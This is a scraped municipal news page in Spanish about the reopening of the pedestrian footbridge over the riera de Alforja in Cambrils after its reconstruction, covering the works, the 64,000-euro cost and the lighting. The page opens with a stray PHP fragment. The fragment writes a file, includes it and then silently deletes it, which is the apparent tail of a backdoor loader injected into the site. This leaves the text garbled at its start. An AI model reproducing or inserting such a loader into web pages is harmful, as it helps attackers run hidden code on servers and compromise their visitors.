");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Se abre la pasarela peatonal de la riera de Alforja de Cambils después de la reconstrucción
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Se abre la pasarela peatonal de la riera de Alforja de Cambils después de la reconstrucción (21/11/2021)

La pasarela peatonal sobre la riera de Alforja de Cambrils se ha abierto hoy tras las obras de reconstrucción impulsadas por el Departamento de Servicios Generales del Ayuntamiento. Este puente de peatones que une el Parque del Pinaret con el Nou Cambrils, a la altura de la calle Rosa Sensat y la comisaría de Mossos d'Esquadra, se derrumbó con el fuerte temporal del 22 de octubre de 2019. Las obras han ido a cargo de la empresa Obras y Servicios Curto SL. por importe de 64.000 euros (más IVA).

El proyecto ha consistido en la reconstrucción de la pilastra del margen izquierdo, la reconstrucción de los dos tramos de tablero, y la reposición de las barandillas y servicios afectados. En cambio, se han podido mantener las escaleras y rampas de acceso, la pilastra del margen derecho y el correspondiente tramo de tablero.

Además, con el fin de evitar que la pasarela se pueda volver a desmoronar debido a la corriente de las aguas, el proyecto ha incluido una cimentación profunda, a base de construir seis micropilotes por cada zapato.

Por último, la actuación también servirá para sustituir y reforzar el alumbrado. Por un lado, en el acceso a la pasarela por el margen izquierdo, se sustituirá el proyector de vapor de sodio montado sobre una columna de un punto de luz de la avenida Adelaida por otro de tecnología Led de 120W más eficiente . Por otro lado, se montarán otros dos proyectores en el margen derecho sobre las dos columnas de alumbrado del vial Charles Robert Darwin, cercanas a la pasarela y conectados a los puntos de luz existentes.

Fuente: Ayuntamiento de Cambrils

Se abre la pasarela peatonal de la riera de Alforja de Cambils después de la reconstrucción

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona